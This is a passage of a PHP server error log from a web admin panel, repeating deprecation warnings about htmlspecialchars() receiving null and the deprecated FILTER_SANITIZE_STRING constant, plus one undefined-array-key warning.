Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:18 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 23 [21-Mar-2025 17:12:50 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:16:15 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:37 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 23 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in 